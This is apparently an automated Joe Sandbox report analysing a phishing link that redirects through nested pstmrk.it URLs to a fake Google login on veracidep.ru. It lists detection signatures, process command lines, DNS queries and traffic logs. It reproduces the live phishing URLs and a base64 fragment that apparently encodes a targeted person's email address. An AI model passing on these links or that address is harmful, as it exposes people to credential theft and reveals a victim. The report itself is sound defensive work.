Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252F8fi5.veracidep.ru%2525252F9rQQ7pYZ%2525252F%25252FGnrm%25252FJIy6AQ%25252FAQ%25252Fc8a642e1-b752-489d-a606-2e0c28c9f43c%25252F1%25252Fp3ItI-koyL%252FGnrm%252FJYy6AQ%252FAQ%252F96a81154-bc5a-4d

Overview

General Information

Sample URL:https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252F8fi5.veracidep.ru%2525252F9rQQ7pYZ%2525252F%25252FGnrm%25252FJIy6AQ%25252FAQ%25252Fc8a642e1-
Analysis ID:1586294
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish44
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
HTML body contains password input but no form action
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7068 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1960,i,7319135450339462896,13108798113578409364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4868 --field-trial-handle=1960,i,7319135450339462896,13108798113578409364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 --field-trial-handle=1960,i,7319135450339462896,13108798113578409364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252F8fi5.veracidep.ru%2525252F9rQQ7pYZ%2525252F%25252FGnrm%25252FJIy6AQ%25252FAQ%25252Fc8a642e1-b752-489d-a606-2e0c28c9f43c%25252F1%25252Fp3ItI-koyL%252FGnrm%252FJYy6AQ%252FAQ%252F96a81154-bc5a-4dec-811a-9ad4ee762256%252F1%252FydnKIiaQi0%2FGnrm%2FJoy6AQ%2FAQ%2F9c58c880-73af-4c48-9b37-4983856d006d%2F1%2FdSmT7Kur-Y/Gnrm/J4y6AQ/AQ/dd03067b-b850-464f-b99d-a4582f20c822/1/nPxHYVfVwy#aGVleW91bmcubGVlbUB0aGVodWJwcm9qZWN0Lm9yZw==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_86JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: https://8fi5.veracidep.ru/9rQQ7pYZ/#aGVleW91bmcubGVlbUB0aGVodWJwcm9qZWN0Lm9yZw==Joe Sandbox AI: Score: 9 Reasons: The brand 'Google' is well-known and typically associated with the domain 'google.com'., The URL '8fi5.veracidep.ru' does not match the legitimate domain for Google., The domain 'veracidep.ru' is unrelated to Google and uses a Russian domain extension, which is unusual for Google services., The subdomain '8fi5' and the main domain 'veracidep' do not have any known association with Google., The presence of a random subdomain and an unrelated main domain is a common tactic in phishing attempts. DOM: 1.1.pages.csv
    Source: Yara matchFile source: dropped/chromecache_86, type: DROPPED
    Source: https://8fi5.veracidep.ru/9rQQ7pYZ/#aGVleW91bmcubGVlbUB0aGVodWJwcm9qZWN0Lm9yZw==Joe Sandbox AI: Page contains button: 'Submit' Source: '1.1.pages.csv'
    Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://8fi5.veracidep.ru/9rQQ7pYZ/#aGVleW91bmcubG... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain (Google login page) after a delay. These behaviors are highly indicative of malicious intent, such as preventing analysis, obfuscating the script's purpose, and potentially attempting to steal user credentials.
    Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://8fi5.veracidep.ru/9rQQ7pYZ/#aGVleW91bmcubG... This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10.
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: Iframe src: https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1161934725&timestamp=1736378115690
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: Iframe src: /_/bscframe
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: Iframe src: https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1161934725&timestamp=1736378115690
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: Iframe src: /_/bscframe
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: Iframe src: https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1161934725&timestamp=1736378115690
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: Iframe src: /_/bscframe
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: Iframe src: https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1161934725&timestamp=1736378115690
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: Iframe src: /_/bscframe
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: <input type="password" .../> found
    Source: https://8fi5.veracidep.ru/9rQQ7pYZ/#aGVleW91bmcubGVlbUB0aGVodWJwcm9qZWN0Lm9yZw==HTTP Parser: No favicon
    Source: https://8fi5.veracidep.ru/9rQQ7pYZ/#aGVleW91bmcubGVlbUB0aGVodWJwcm9qZWN0Lm9yZw==HTTP Parser: No favicon
    Source: https://8fi5.veracidep.ru/9rQQ7pYZ/#aGVleW91bmcubGVlbUB0aGVodWJwcm9qZWN0Lm9yZw==HTTP Parser: No favicon
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No favicon
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No favicon
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No favicon
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No favicon
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No favicon
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No <meta name="author".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No <meta name="author".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No <meta name="author".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No <meta name="author".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No <meta name="author".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No <meta name="copyright".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No <meta name="copyright".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No <meta name="copyright".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No <meta name="copyright".. found
    Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AeZLP9944SVI-vDZ-osELLGQpCKNf1aSyqaA4hJSay_O9iLVmkL8cHRIJNWvHTuBDWtRy_YsLrx_&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S168058108%3A1736378111260761&ddm=1HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:52745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:52746 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:52754 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:52757 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
    Source: global trafficDNS traffic detected: DNS query: click.pstmrk.it
    Source: global trafficDNS traffic detected: DNS query: 8fi5.veracidep.ru
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdn.prod.website-files.com
    Source: global trafficDNS traffic detected: DNS query: oeaeu71gzikiqt8roie5q75ctwhhbrlv33xxdegjxuarbh1znklc.chiblaispi.ru
    Source: global trafficDNS traffic detected: DNS query: accounts.youtube.com
    Source: global trafficDNS traffic detected: DNS query: play.google.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52757
    Source: unknownNetwork traffic detected: HTTP traffic on port 52817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52754
    Source: unknownNetwork traffic detected: HTTP traffic on port 52756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52755
    Source: unknownNetwork traffic detected: HTTP traffic on port 52733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52797
    Source: unknownNetwork traffic detected: HTTP traffic on port 52746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52804
    Source: unknownNetwork traffic detected: HTTP traffic on port 52820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52805
    Source: unknownNetwork traffic detected: HTTP traffic on port 52753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52760
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52763
    Source: unknownNetwork traffic detected: HTTP traffic on port 52747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52809
    Source: unknownNetwork traffic detected: HTTP traffic on port 52743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52813
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52818
    Source: unknownNetwork traffic detected: HTTP traffic on port 52821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52739
    Source: unknownNetwork traffic detected: HTTP traffic on port 52754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52733
    Source: unknownNetwork traffic detected: HTTP traffic on port 52805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52747
    Source: unknownNetwork traffic detected: HTTP traffic on port 52759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52822
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52746
    Source: unknownNetwork traffic detected: HTTP traffic on port 52822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52749
    Source: unknownNetwork traffic detected: HTTP traffic on port 52790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52820
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52744
    Source: unknownNetwork traffic detected: HTTP traffic on port 52755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52821
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52741
    Source: unknownNetwork traffic detected: HTTP traffic on port 52734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52742
    Source: unknownNetwork traffic detected: HTTP traffic on port 52751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52790
    Source: unknownNetwork traffic detected: HTTP traffic on port 52797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52745 -> 443
    Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:52745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:52746 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:52754 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:52757 version: TLS 1.2
    Source: classification engineClassification label: mal64.phis.win@23/27@28/211
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1960,i,7319135450339462896,13108798113578409364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
